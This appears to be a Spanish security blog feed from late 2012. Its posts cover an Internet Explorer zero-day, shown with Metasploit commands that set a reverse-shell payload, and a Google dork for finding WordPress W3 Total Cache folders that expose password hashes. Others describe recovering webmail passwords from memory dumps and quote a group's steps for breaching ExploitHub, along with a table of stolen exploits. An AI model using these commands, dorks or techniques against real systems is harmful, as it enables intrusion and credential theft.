
Quiero darles las gracias a todos aquellos que me apoyan tanto con sus lecturas como con sus comentarios, quiero mandarles especiales Salu2 a Caleb Bucker y a Dump3R.

Por último quiero desearles un buen pasar, estudien, lean mucho, disfruten de sus vacaciones si es que tienen y no dejen de visitarme xD.

[+] Feliz Año Nuevo y Próspero 2013!!

[+] Salu2

[+] Zion3R

Grave 0-Day en Internet Explorer 6, 7 y 8 Vulnerabilidad CDwnBindInfo [Video MSF]

noreply@blogger.com (Zion3R) — Sun, 30 Dec 2012 22:04:05 PST

Se ha detectado un grave 0day en Internet Explorer versiones 6, 7 y 8. El día miércoles 26 de diciembre CFR.org ha sido víctima de un ataque mal intencionado, ataque en el cual los visitantes que usaban Internet Explorer eran infectados por un nuevo 0Day. Ya se tenia registro de esta vulnerabilidad desde el 7 de Diciembre, pero fue gracia a lo ocurrido en CFR.org que binjo, Eric Romang y FireEye han realizado unos acuciosos análisis, y desde ayer que se tiene un módulo funcional en Metasploit que explota este fallo.

Este módulo se aprovecha de un fallo que ocurre cuando el objeto CDwnBindInfo es liberado por FollowHyperlink2, pero una referencia se mantiene en CDOC. Como resultado, cuando se usa la referencia durante la recarga de la página, se puede manipular una parte de la memoria, dando paso así a poder ejecutar código arbitrario.

Les dejo un Vídeo demostrativo donde explotan el fallo con Metasploit:

use exploit/windows/browser/ie_cdwnbindinfo_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sysinfo
getuid

Referencias:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792
http://technet.microsoft.com/en-us/security/advisory/2794220
http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/
http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html
http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/
Video:
http://eromang.zataz.com/2012/12/30/microsoft-internet-explorer-cdwnbindinfo-vulnerability-metasploit-demo/

[+] Salu2

Vulnerabilidad Crítica en WordPress en popular plugin "W3 Total Cache"

noreply@blogger.com (Zion3R) — Thu, 27 Dec 2012 10:39:36 PST

Recientemente se ha descubierto una Vulnerabilidad Crítica en el popular plugin "W3 Total Cache" de WordPress que se utiliza para mejorar el rendimiento del sitio y la experiencia de usuario a través de almacenamiento del cache. Este Full-disclosure ocurre debido a la forma en que W3TC almacena la caché de base de datos en directorios con acceso público, donde en el mejor (o peor de los casos para los webmasters) se pueden recuperar los hashes de contraseñas y la información de base de datos guardad en el cache.

La ubicación predeterminada donde este plugin guarda los datos es "/wp-content/w3tc/dbcache/".

Por lo famoso que es este plugin, lo transforma en una amenaza poderosa para los usuarios de WordPress, y un potencial atacante podría comprometer fácilmente la web en su totalidad. La recomendación para los webmasters es que actualice el plugin a la versión nueva o denegar el acceso al directorio agregando un htccess.

La masividad y facilidad de explotar esta falla se hace notar con una simple búsqueda con google:

inurl:/wp-content/w3tc/dbcache/

Encontramos 227.000 resultados y la mayoría son vulnerables.

y simplemente hay que abrir los archivos con un editor de texto plano para poder ver las bases de datos guardadas en cache.

Más información: http://seclists.org/fulldisclosure/

[-] Salu2
[-] Zion3R

Blackploit les desea Feliz Navidad y Próspero Año Nuevo!

noreply@blogger.com (Zion3R) — Mon, 24 Dec 2012 11:02:24 PST

Blackploit les desea una excelente Navidad y un Próspero Año Nuevo!! De paso quiero agradecerles todas sus visitas, lecturas y comentarios, esperamos que en este año que comienza poder seguir escribiéndoles y de paso seguir creciendo!

Les deseo lo mejor, sigan leyendo y estudiando ;)

[+] Salu2

[-] Zione

P.D: Aprovechando este Post quería anunciarles que mi amigo Dump3R a abierto un blog sobre Herramientas y Apps de Hack y PenTest, y yo le he prestado subdominio. Si tienen tiempo visitenlo ;)

http://hack-tools.blackploit.com/

Obtener Contraseñas de Hotmail, Yahoo, Gmail de la Memoria

noreply@blogger.com (Zion3R) — Wed, 19 Dec 2012 10:51:38 PST

La mayoría de las personas se sienten seguras al "Cerrar Sesión" o al hacer "Sign Out" en una web, yo también lo estaría, el problema es que las peticiones webs quedan guardadas en memoria, y con la ayuda de un programa podemos volcarlas (recuperarlas) y con un Editor Hexadecimal revisarlas para poder analizarlas legíblemente.

Es así como Hotmail, Yahoo, Gmail y muchas otras webs con autentificación en algún momento dentro de las peticiones locales pasan la contraseña en texto plano, lo cual es un problema ya que como dije antes, podemos recuperar de la memoria estas peticiones y conseguir la contraseña en bonito texto plano.

Aquí les dejo un video donde usan MoonSols Windows Memory "DumpIt" para volcar la memoria y WinHex para obtener localmente las contraseñas de Hotmail, Yahoo, Gmail. Recuerden también que este método es efectivo con la mayoría de webs con autentificación sólo que hay que identificar el ID necesario para poder encontrar la contraseña, normalmente es "passwd", "password", "pass", "psswd", "pwd", es cosa de usar la imaginación.

Herramientas:

[+] Salu2
[*] Zion3R

Inj3ct0r Team hackea a ExploitHub y roba más de 200 Exploits Privados

noreply@blogger.com (Zion3R) — Sat, 15 Dec 2012 06:29:12 PST

Recientemente Inj3ct0r Team ha hackeado a ExploitHub, quienes guardaban consigo más de 200 exploits privados que comercializaban a módicos precios (más abajo la tabla con los detalles).

En un archivo publicado por Inj3ct0r Team (http://priv8.1337day.com/exploitHUB.txt) dejan entrever la facilidad con la que actuaron:

I am very much surprised when he learned of Magento eCommerce Software and search /install/ 

1) We scan server and site
2) We reinstall Magento CMS https://www.exploithub.com/install/  <= We reinstall Magento CMS
3) Upload shell and phpinfo https://www.exploithub.com/phpinfo.php
4) backup all files and database.
5) Upload piece of the database https://www.exploithub.com/export/
6) Increased privileges and use root


We have exploithub.com private database and FTP files)

PHPinfo ExploitHub

En este momento todos los exploits robados están en http://1337day.com/, algunos son gratis y otros son de pago...

Mal por la seguridad de ExploitHub y en este mismo momento estoy revisando los exploits filtrados a ver con que me encuentro.

Aquí les dejo una tabla bastante extensa con los exploits, los productos afectados, el precio y el autor del exploit.

product_name	product_price	created_date	author_id	author_username
CA Total Defense Suite deleteReportFilter Stored Procedure SQL Injection	100.0000	02-01-2012 14:45	60	Mario
Novell iPrint Client ActiveX Control debug Buffer Overflow	50.0000	02-01-2012 14:45	60	Mario
Trend Micro Internet Security Pro 2010 ActiveX Control Buffer Overflow	50.0000	02-01-2012 14:46	60	Mario
Oracle ABORT_TABLE_INSTANTIATION Buffer Overflow	1000.0000	18-03-2011 16:30	60	Mario
Oracle CREATE_DATABASE_LINK Buffer Overflow	1100.0000	18-03-2011 16:32	60	Mario
Oracle DELETE_REFRESH_OPERATIONS Buffer Overflow	1000.0000	18-03-2011 16:32	60	Mario
Oracle DIFFERENCES Buffer Overflow	1000.0000	18-03-2011 16:33	60	Mario
Oracle DISABLE_RECEIVER_TRACE Buffer Overflow	1000.0000	18-03-2011 16:35	60	Mario
Oracle FROM_TZ() Buffer Overflow	1000.0000	18-03-2011 16:36	60	Mario
Oracle GENERATESCHEMA Buffer Overflow.	1500.0000	22-03-2011 21:01	60	Mario
Oracle GET_FULL_FILENAME Buffer Overflow.	1000.0000	22-03-2011 20:57	60	Mario
Oracle9i INSTANTIATE_OFFLINE Buffer Overflow	1000.0000	18-03-2011 16:39	60	Mario
Oracle9i KSDWRT Buffer Overflow	1000.0000	18-03-2011 16:39	60	Mario
Oracle NUMTODSINTERVAL() Buffer Overflow.	1500.0000	22-03-2011 21:03	60	Mario
Oracle NUMTOYMINTERVAL() Buffer Overflow	1000.0000	18-03-2011 16:41	60	Mario
Oracle PARALLEL_PUSH_RECOVERY Buffer Overflow	1000.0000	18-03-2011 16:42	60	Mario
Oracle10g PITRIG_DROP Buffer Overflow	1000.0000	18-03-2011 16:43	60	Mario
Oracle10g PITRIG_DROPMETADATA Buffer Overflow	1200.0000	18-03-2011 16:44	60	Mario
Oracle10g PITRIG_TRUNCATE Buffer Overflow	1000.0000	18-03-2011 16:44	60	Mario
Oracle SYS.LTUTIL Buffer Overflow	1200.0000	18-03-2011 16:45	60	Mario
Oracle9i REGISTER_USER_REPGROUP Buffer Overflow	1000.0000	18-03-2011 16:47	60	Mario
Oracle SDO_CODE_SIZE Buffer Overflow	1000.0000	18-03-2011 16:48	60	Mario
Oracle SET TIME_ZONE Buffer Overflow	1000.0000	18-03-2011 16:48	60	Mario
Oracle CTX_OUTPUT() Buffer Overflow	1000.0000	18-03-2011 16:49	60	Mario
Oracle TO_TIMESTAMP_TZ() Buffer Overflow	1000.0000	18-03-2011 16:50	60	Mario
Oracle TZ_OFFSET() Buffer Overflow	1000.0000	18-03-2011 16:51	60	Mario
Oracle DBMS_AQADM Buffer Overflow	1000.0000	18-03-2011 16:52	60	Mario
DBMS_JVM_EXP_PERMS Escalation	500.0000	18-03-2011 16:53	60	Mario
Oracle extjob.exe Command Execution Vulnerability	200.0000	06-10-2011 10:42	60	Mario
CTXSYS.DRILOAD SQL Injection	125.0000	26-01-2011 15:37	60	Mario
SET_OUTPUT_TO_JAVA SQL Injection	1000.0000	18-03-2011 16:55	60	Mario
Symantec Alert Management System ModemString Buffer Overflow	200.0000	14-06-2012 11:39	60	Mario
Symantec Alert Management System PinNumber Buffer Overflow	200.0000	27-11-2011 14:41	60	Mario
KingView 6.53 SCADA HMI HistorySvr Heap Overflow	250.0000	23-03-2011 13:31	84	Ian
IGSS IGSSdataServer.exe opcode 0xd overflow	500.0000	15-06-2011 10:55	89	hal
Opera Browser 10.62 border-radius (SVG handler) Memory Corruption	100.0000	17-06-2011 8:51	184	Ss3c
FactoryLink vrn.exe opcode 9 overflow	500.0000	15-06-2011 10:55	89	hal
Lotus Domino iCalendar Stack Overflow	1500.0000	14-06-2011 15:43	209	jgrusko
IBM Lotus Domino 8.5.2 WebAdmin.nsf Cross-Site Scripting Vulnerability	0.0000	10-07-2011 5:59	126	r0i
Site License	0.0000	20-07-2011 2:29
Adobe Flash Player newfunction rop 2	200.0000	30-07-2011 15:43	62	NSSLabs
Adobe Flash Player newfunction rop 3	200.0000	30-07-2011 15:43	62	NSSLabs
Adobe Flash Player newfunction rop 4	200.0000	30-07-2011 15:44	62	NSSLabs
ms11_003_ie_css_import_stackpivot_rop_1	250.0000	30-07-2011 15:59	62	NSSLabs
ms11_003_ie_css_import_stackpivot_rop_2	250.0000	30-07-2011 16:00	62	NSSLabs
ms11_003_ie_css_import_stackpivot_rop_3	250.0000	30-07-2011 16:03	62	NSSLabs
ms11_003_ie_css_import_stackpivot_rop_4	250.0000	30-07-2011 16:02	62	NSSLabs
ms11_003_ie_css_import_stackpivot_rop_5	250.0000	30-07-2011 16:04	62	NSSLabs
ms11_003_ie_css_import_stackpivot_rop_6	250.0000	30-07-2011 16:04	62	NSSLabs
ms11_003_ie_css_import_stackpivot_rop_7	250.0000	30-07-2011 16:06	62	NSSLabs
ms11_003_ie_css_import_stackpivot_rop_8	250.0000	30-07-2011 16:08	62	NSSLabs
ms11_003_ie_css_import_stackpivot_rop_9	250.0000	30-07-2011 16:09	62	NSSLabs
ms11_003_ie_css_import_stackpivot_rop_10	250.0000	30-07-2011 16:10	62	NSSLabs
ms11_003_ie_css_import_stackpivot_rop_11	250.0000	30-07-2011 16:10	62	NSSLabs
ms11_003_ie_css_import_stackpivot_rop_12	250.0000	30-07-2011 16:11	62	NSSLabs
ms11_003_ie_css_import_stackpivot_rop_13	250.0000	30-07-2011 16:12	62	NSSLabs
ms11_003_ie_css_import_stackpivot_rop_14	250.0000	30-07-2011 16:13	62	NSSLabs
ms11_003_ie_css_import_stackpivot_rop_15	250.0000	30-07-2011 16:14	62	NSSLabs
Adobe Flash Player newfunction rop 1	200.0000	01-08-2011 15:24	62	NSSLabs
Adobe CoolType SING Table winxp rop 1	250.0000	01-08-2011 18:13	62	NSSLabs
Adobe CoolType SING Table win7 rop 1	250.0000	01-08-2011 18:16	62	NSSLabs
Citrix Systems Provisioning Services 5.6 Buffer Overflow Module	300.0000	01-08-2011 18:18	62	NSSLabs
Avaya WinPMD UniteHostRouter Buffer Overflow	200.0000	07-08-2011 9:42	60	Mario
Oracle TO_CHAR() Buffer Overflow.	1000.0000	08-08-2011 14:55	60	Mario
Oracle DBMS_JAVA_TEST Buffer Overflow.	1000.0000	08-08-2011 15:08	60	Mario
Oracle Database and Enterprise Manager Grid Control Remote Code Execution	500.0000	14-08-2011 16:26	60	Mario
Oracle Outside In CDR Buffer Overflow	200.0000	13-08-2011 18:27	60	Mario
Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability	500.0000	14-08-2011 16:29	60	Mario
Firefox sensor.dll Insecure Library Loading	100.0000	10-12-2011 13:50	60	Mario
IBM Lotus Forms Viewer Insecure Library Loading	100.0000	20-07-2012 21:15	60	Mario
Wireshark Insecure Script Loading	50.0000	02-01-2012 14:51	60	Mario
PcVue v5.52 (SVUIGrd.ocx) ActiveX Control Remote Code Execution	500.0000	04-10-2011 0:45	288	^rwX
DATAC RealWin SCADA Server On_FC_BINFILE_FCS_FILE (0a) Buffer Overflow	100.0000	06-10-2011 0:57	60	Mario
DATAC RealWin SCADA Server On_FC_CGETTAG_FCS_GETTELEMETRY Buffer Overflow	100.0000	06-10-2011 14:42	60	Mario
DATAC RealWin SCADA Server On_FC_CGETTAG_FCS_SETTELEMETRY Buffer Overflow	100.0000	06-10-2011 14:45	60	Mario
DATAC RealWin SCADA Server On_FC_SCRIPT_FCS_STARTPROG Buffer Overflow	100.0000	06-10-2011 14:46	60	Mario
DATAC RealWin SCADA Server On_FC_CGETTAG_FCS_SETCHANNELTELEMETRY Buffer Overflow	100.0000	06-10-2011 14:55	60	Mario
DATAC RealWin SCADA Server On_FC_CGETTAG_FCS_GETCHANNELTELEMETRY Buffer Overflow	100.0000	06-10-2011 15:03	60	Mario
Tunnelblick (Mac OS X third-party software) Privilege Escalation	300.0000	06-10-2011 16:35	238	subreption
OpenVPN Trusted Path Privilege Escalation	50.0000	07-10-2011 16:52	60	Mario
ACDSee FotoSlate Int Buffer Overflow	100.0000	10-10-2011 16:57	60	Mario
Safari SVGPathSegList Use-After-Free	500.0000	10-08-2012 14:57	200	dput
IBM Lotus Domino Web Server If-Modified-Since Remote Buffer Overflow	100.0000	11-10-2011 1:14	60	Mario
DATAC RealWin FCS_ADDTAGMS Buffer Overflow	100.0000	12-10-2011 20:02	280	James
DATAC RealWin FCS_CADDTAG Buffer Overflow	100.0000	12-10-2011 20:04	280	James
DATAC RealWin FCS_CDELTAG Buffer Overflow	100.0000	12-10-2011 20:06	280	James
DATAC RealWin On_FC_BINFILE_FCS_FILE_D Buffer Overflow DEP Bypass	150.0000	12-10-2011 20:08	280	James
DATAC RealWin On_FC_BINFILE_FCS_FILE_B Buffer Overflow	100.0000	12-10-2011 20:10	280	James
DATAC RealWin On_FC_BINFILE_FCS_FILE_C Buffer Overflow	100.0000	12-10-2011 20:12	280	James
DATAC RealWin On_FC_BINFILE_FCS_FILE_E Buffer Overflow	100.0000	12-10-2011 20:13	280	James
DATAC RealWin On_FC_BINFILE_FCS_FILE_F Buffer Overflow	100.0000	12-10-2011 20:15	280	James
HP iNode Management Center iNodeMngChecker Buffer Overflow	100.0000	17-10-2011 11:59	60	Mario
Microsoft Office Uninitialized Object Pointer Vulnerability	250.0000	01-11-2012 4:03	354	xBoy
ACDSee XBM Variable Name Buffer Overflow	50.0000	14-04-2012 11:31	60	Mario
Cytel Studio LogXact USE Buffer Overflow	50.0000	03-11-2011 20:49	60	Mario
EMC Autostart Domain Name Logging Buffer Overflow	100.0000	05-12-2011 7:11	60	Mario
Oracle SDO_CS.TRANSFORM_LAYER Buffer Overflow	500.0000	13-12-2011 19:29	60	Mario
Oracle DBLINK_INFO Buffer Overflow.	400.0000	13-12-2011 20:25	60	Mario
Oracle DBMS_AQJMS_INTERNAL.AQ$_REGISTER Buffer Overflow	300.0000	13-12-2011 23:12	60	Mario
Oracle DBMS_AQJMS_INTERNAL.AQ$_UNREGISTER Buffer Overflow	300.0000	13-12-2011 23:15	60	Mario
DameWare Mini Remote Control NTLMSSP Buffer Overflow	100.0000	14-12-2011 23:33	60	Mario
DameWare Mini Remote Control USERNAME Buffer Overflow	100.0000	14-12-2011 23:35	60	Mario
eSignal WinSig.exe long StyleTemplate Buffer Overflow	100.0000	19-12-2011 23:11	60	Mario
NetDecision TFTP Server Directory Traversal	50.0000	21-12-2011 23:52	60	Mario
CA Total Defense Suite UNC Management Console deleteReportTemplate Store d Procedure SQL Injection	100.0000	22-12-2011 0:57	60	Mario
Sunway Force Control <= 6.1 httpsvr.exe	100.0000	24-12-2011 2:11	280	James
HP Managed Printing Admistration jobAcct Arbitrary File Creation	25.0000	24-12-2011 16:31	60	Mario
HP Managed Printing Admistration jobDelivery Arbitrary File Creation	25.0000	24-12-2011 16:33	60	Mario
FreeBSD telnetd Buffer Overflow	75.0000	28-12-2011 0:37	60	Mario
ESTsoft ALZip MIM File Buffer Overflow	100.0000	28-12-2011 21:49	280	James
Novell iPrint Client ActiveX Control GetDriverFile Buffer Overflow	100.0000	29-12-2011 0:12	60	Mario
Novell iPrint Client ActiveX Control GetDriverSettings Buffer Overflow	100.0000	29-12-2011 23:08	60	Mario
HastyMail rsargs[] Arbitrary Command Injection	100.0000	02-01-2012 18:01	60	Mario
Trend Micro InterScan Web Security Suite Local Privilege Escalation	50.0000	06-01-2012 15:09	60	Mario
Citrix Provisioning Services streamprocess.exe 0x40020000 Buffer Overflow	100.0000	27-03-2012 20:39	60	Mario
Citrix Provisioning Services streamprocess.exe 0x40020002 Buffer Overflow	100.0000	27-03-2012 20:40	60	Mario
Citrix Provisioning Services streamprocess.exe 0x40020004 Buffer Overflow	100.0000	27-03-2012 20:40	60	Mario
Citrix Provisioning Services streamprocess.exe 0x40020006 Buffer Overflow	100.0000	27-03-2012 20:41	60	Mario
SolarWinds Storage Manager Server SQL Injection Authentication Bypass And Command Execution	100.0000	27-03-2012 20:41	60	Mario
Sunway Forcecontrol <= 6.1 sp3 SNMP NetDBServer.exe	100.0000	30-01-2012 17:04	280	James
Motorola Netopia netOctopus SDCS Buffer Overflow	100.0000	27-03-2012 20:41	60	Mario
CA Total Defense Suite deleteReportFilter Stored Procedure SQL Injection	100.0000	17-04-2012 17:30	60	Mario
Exploit-builder for CVE-2011-0611	500.0000	15-03-2012 15:11	417	Excoriot
Cisco VPN Client Arbitrary Command Injection	50.0000	29-02-2012 20:24	60	Mario
TheGreenBow IPSec VPN Client Arbitrary Command Injection	50.0000	01-03-2012 15:12	60	Mario
Trend Micro ServerProtect 5.58 CMON_ActiveRollback Buffer Overflow	100.0000	06-03-2012 15:47	60	Mario
Trend Micro ServerProtect 5.58 CMON_ActiveUpdate Buffer Overflow	100.0000	06-03-2012 15:48	60	Mario
Trend Micro ServerProtect 5.58 SetSvcImpersonateUser Buffer Overflow	100.0000	06-03-2012 16:17	60	Mario
Trend Micro ServerProtect 5.58 RPCFN_ENG_AddTaskExportLogItem Buffer Overflow	100.0000	06-03-2012 19:46	60	Mario
Trend Micro ServerProtect 5.58 SetPagerNotifyConfig Buffer Overflow	100.0000	06-03-2012 19:45	60	Mario
Trend Micro ServerProtect 5.58 ENG_SENDMAIL Buffer Overflow	100.0000	06-03-2012 20:52	60	Mario
Trend Micro ServerProtect 5.58 CMON_NetTestConnection Buffer Overflow	100.0000	07-03-2012 14:01	60	Mario
Computer Associates Alert Notification 0x15 Buffer Overflow	100.0000	08-03-2012 16:57	60	Mario
Computer Associates Alert Notification 0x17 Buffer Overflow	100.0000	08-03-2012 16:58	60	Mario
NETGEAR SafeNet SoftRemote IKE Service Buffer Overflow	100.0000	10-03-2012 14:57	60	Mario
freeSSHD 1.2.1 FXP_OPENDIR Buffer Overflow	100.0000	12-03-2012 14:13	60	Mario
freeSSHD 1.2.1 FXP_RENAME Buffer Overflow	100.0000	12-03-2012 14:14	60	Mario
GoodTech SSH FXP_OPEN Buffer Overflow	100.0000	12-03-2012 15:00	60	Mario
MPlayer SAMI Subtitle File Buffer Overflow	100.0000	16-03-2012 17:09	60	Mario
Internet Explorer 8 Insecure Library Loading Client-Side Remote Code Execution	300.0000	22-03-2012 18:17	422	41.w4r10r
Novell ZENworks CM Preboot Service Opcode 6 Buffer Overflow	100.0000	26-03-2012 21:26	60	Mario
Elastix PBX 2.2.0 callme_page.php Remote Command Execution with Local Privilege Escalation	1100.0000	22-04-2012 22:02	423	aisg-001
Novell ZENworks CM Preboot Service Opcode 21 Buffer Overflow	100.0000	27-03-2012 1:57	60	Mario
CA Total Defense Suite exportReport Stored Procedu re SQL Injection	100.0000	28-03-2012 12:19	60	Mario
PEiD PE Import Directory Buffer Overflow	100.0000	30-03-2012 18:52	60	Mario
Novell ZENworks CM Preboot Service Opcode 4C Buffer Overflow	100.0000	04-04-2012 11:47	60	Mario
LANDesk Lenovo ThinkManagement Console ServerSetup Command Execution	100.0000	04-04-2012 13:12	60	Mario
Disk Pulse Server GetServerInfo Buffer Overflow	100.0000	10-04-2012 14:39	60	Mario
Rabox WinLPD Buffer Overflow	100.0000	11-04-2012 22:18	60	Mario
Quest Big Brother Remote File Creation	100.0000	12-04-2012 16:28	60	Mario
SGI Infosrch.cgi fname Command Execution	50.0000	13-06-2012 11:32	60	Mario
Nucleus Kernel Recovery for Novell Buffer Overflow	100.0000	15-04-2012 14:15	60	Mario
HP OmniInet.exe Opcode 17 Buffer Overflow	100.0000	20-04-2012 15:17	60	Mario
HP OmniInet.exe Opcode 35 Buffer Overflow	100.0000	21-04-2012 11:45	60	Mario
HP OmniInet.exe Opcode 46 Buffer Overflow	100.0000	22-04-2012 12:08	60	Mario
magicdoc.py	200.0000	09-12-2012 18:10	471	n0ne
CVE-2011-3402 (MS11-087)	1000.0000	30-07-2012 1:12	483	Ling Chuan Lee
Safari SVGPointList Use-After-Free	500.0000	10-08-2012 14:56	200	dput
CVE-2005-0750 - Linux Kernel bluetooth integer underflow	500.0000	13-06-2012 8:24	200	dput
CA BrightStor ARCserve Backup caloggerd Arbitrary File Writing Exploit	500.0000	13-06-2012 8:33	200	dput
CA BrightStor ARCserve Backup XDR Parsing Buffer Overflow Exploit	500.0000	13-06-2012 8:37	200	dput
ZABBIX Server node_process_command() Command Execution	50.0000	13-06-2012 12:55	60	Mario
GlobalSCAPE CuteZIP Buffer Overflow	50.0000	13-06-2012 12:55	60	Mario
Blue Coat Reporter Directory Traversal Scanner	100.0000	16-06-2012 18:25	114	bannedit
VMware Workstation VMNC Codec Parsing Remote Code Execution Vulnerability	300.0000	24-06-2012 18:47	490	exodusintel
WordPress plugin Asset manager upload.php Arbitrary Code Execution	25.0000	27-06-2012 12:37	491	Sooraj
WordPress plugin WP-Property uploadify.php Arbitrary Code Execution	25.0000	27-06-2012 12:44	491	Sooraj
GoodTech SSH Server 6.5 Stack Buffer Overflow	100.0000	13-07-2012 14:00	280	James
PEiD <= 0.92 Stack Buffer Overflow	100.0000	13-07-2012 14:02	280	James
Cisco Linksys PlayerPT SetSource() ActiveX Buffer Overflow	25.0000	20-07-2012 14:47	60	Mario
IBM Cognos tm1admsd.exe Buffer Overflow	50.0000	23-07-2012 15:50	60	Mario
IBM Cognos tm1admsd.exe Buffer Overflow	50.0000	23-07-2012 15:53	60	Mario
Novell ZENworks Asset Management Remote Code Execution	100.0000	27-07-2012 21:13	60	Mario
ACDSee Photo Editor 2008 XBM Variable Name Buffer Overflow	100.0000	29-07-2012 19:31	280	James
Cytel Studio 9.0 (CYB File) Stack Buffer Overflow	100.0000	29-07-2012 19:33	280	James
Disk Pulse Server 'GetServerInfo' Buffer Overflow	100.0000	29-07-2012 19:36	280	James
eSignal Pro <= 10.6.2425.1208 (QUO File) Buffer Overflow	100.0000	30-07-2012 2:34	280	James
FreeSSHD <= 1.2.1 FXP_OPENDIR	100.0000	29-07-2012 19:39	280	James
FreeSSHD <= 1.2.1 FXP_RENAME	100.0000	29-07-2012 19:41	280	James
R4 winamp plugin	100.0000	05-09-2012 14:49	280	James
Solarwinds <= 5.1.2 LoginServlet Auth Bypass SQLi	100.0000	29-07-2012 19:48	280	James
Winamp 5.55 (MAKI script) Stack Buffer Overflow	50.0000	29-07-2012 19:50	280	James
Internet Explorer <=9 Remote Code Execution	700.0000	03-08-2012 15:47	422	41.w4r10r
IBM Lotus Quickr QP2 ActiveX Import_Times Buffer Overflow	25.0000	04-08-2012 15:52	60	Mario
IBM Lotus Quickr QP2 ActiveX Attachment_Times Buffer Overflow	25.0000	04-08-2012 15:54	60	Mario
Oracle Jinitiator beans.ocx ActiveX Control Stack Overflow	150.0000	23-08-2012 8:49	495	aushack
Oracle Business Transaction Management FlashTunnelService WriteToFile Code Execution	50.0000	28-08-2012 11:34	60	Mario
HP SiteScope SOAP getFileInternal Arbitrary File Read	25.0000	05-09-2012 17:25	60	Mario
HP SiteScope SOAP loadFileContent Arbitrary File Read	25.0000	05-09-2012 17:27	60	Mario
Oracle Outside In XPM Buffer Overflow	25.0000	14-09-2012 17:19	60	Mario
Oracle Solaris Privilege Escalation	100.0000	24-10-2012 0:00	517	unSecurityResearch
Novell GroupWise Client 8.0.0 - 2012 - LWP Attachment Buffer Overflow	270.0000	04-11-2012 12:57	79	alino
IBM Informix Dynamic Server Password Buffer Overflow	50.0000	19-10-2012 22:31	60	Mario
MySQL on Windows Remote system Exploit post-auth	1500.0000	30-11-2012 19:59	58	Kingcope
Webmin Status Remote Perl Command/Library Execution	500.0000	01-11-2012 3:32	423	aisg-001
Webmin Show CGI Remote Command Execution	500.0000	01-11-2012 3:47	423	aisg-001
Cisco Prime Data Center Network Manager Remote Command Execution	25.0000	05-11-2012 17:24	60	Mario
McAfee Web Reporter File Upload and Execute	25.0000	06-11-2012 19:47	60	Mario
SGI infosrch.cgi fname Command Execution	0.0000	16-11-2012 19:28	528	test
Secure Computing SmartFilter File Upload and Execute	25.0000	12-11-2012 14:21	60	Mario
supplementary	0.0000	17-11-2012 14:35	528	test
Site License Plus	0.0000	19-11-2012 13:33
TEST_LIVE	0.0000	19-11-2012 20:20	528	test
Test Product Live #999	150.0000	21-11-2012 21:59	528	test
XAMPP mssql_connect() Buffer Overflow	25.0000	26-11-2012 15:37	60	Mario
Test Product Live #888	80.0000	25-11-2012 21:11	528	test
Test Product Live #887	70.0000	25-11-2012 17:27	528	test
Test Product Live #885	69.0000	25-11-2012 18:29	528	test
jose_test	0.0000	07-12-2012 20:01	528	test
Mobile Rifatron DVR web version Authentication-free hack	0.0000	09-12-2012 22:16	593	Renard
MsOfficeWord2010	200.0000	09-12-2012 18:27	471	n0ne

[+] Salu2
[+] Zion3R

Blackploit [PenTest]

CheatSheet con 400 comandos para GNU/Linux que deberías saber

Índice:

Información del sistema

Apagar (Reiniciar Sistema o Cerrar Sesión)

Archivos y Directorios

Encontrar archivos

Montando un sistema de ficheros

Espacio de Disco

Usuarios y Grupos

Permisos en Ficheros (Usa ”+” para colocar permisos y ”-” para eliminar)

Atributos especiales en ficheros (Usa ”+” para colocar permisos y ”-” para eliminar)

Archivos y Ficheros comprimidos

Paquetes RPM (Red Hat, Fedora y similares)

Actualizador de paquetes YUM (Red Hat, Fedora y similares)

Paquetes Deb (Debian, Ubuntu y derivados)

Actualizador de paquetes APT (Debian, Ubuntu y derivados)

Ver el contenido de un fichero

Manipulación de texto

Establecer caracter y conversión de ficheros

Análisis del sistema de ficheros

Formatear un sistema de ficheros

Trabajo con la SWAP

Salvas (Backup)

CD-ROM

Trabajo con la RED ( LAN y Wi-Fi)

Redes de Microsoft Windows (SAMBA)

Tablas IP (CORTAFUEGOS)

Monitoreando y depurando

Otros comandos útiles

Nuevo Bug en Java 7u17 (Video MSF) [Applet Reflection Type Confusion RCE]

El Reality Show del Mundo Real - Más de 9 mil cámaras IP expuestas

OWASP Top 10 2013 - Las 10 vulnerabilidades más Críticas

SQLi utilizando método POST con SQLMap

Saltarse la contraseña (passcode) en iPhone 4 con iOS 6.1.3

Kali Linux, Nueva Distribución de Pentesting de los creadores de Backtrack

Diccionarios para Realizar Ataques de Fuerza Bruta - Brute Forcing Word List Resources

Otro 0day en Java permite Ejecución de Código Remoto (Video MSF)

Saltándose la Contraseña de un iOS 6.1 (Forma II) (Video)

The Pirate Bay - Away From Keyboard (Documental, Subtítulos en Español)

Cómo Instalar Metasploit en iOS 6.1 (Video)

Saltándose la Contraseña de un iOS 6.1 (Video)

WikiRebels - Wikileaks: Con la Filtración como Arma (Documental Subtitulado)

Inj3ct0r (1337day) Hackeado por Injector & Sec4ever Team

2 Graves vulnerabilidades en Java permite Ejecución de Código Remoto, Java Applet AverageRangeStatisticImpl & Method Handle (Videos MSF)

Grave 0day en Java permite Ejecución de Código Remoto (Video MSF)

Conseguir Shell por SQLi con SQLMap

Manual de HashCat en Español (PDF)

Feliz Año Nuevo y Próspero 2013!!

Grave 0-Day en Internet Explorer 6, 7 y 8 Vulnerabilidad CDwnBindInfo [Video MSF]

Vulnerabilidad Crítica en WordPress en popular plugin "W3 Total Cache"

Blackploit les desea Feliz Navidad y Próspero Año Nuevo!

Obtener Contraseñas de Hotmail, Yahoo, Gmail de la Memoria

Inj3ct0r Team hackea a ExploitHub y roba más de 200 Exploits Privados

Información del sistema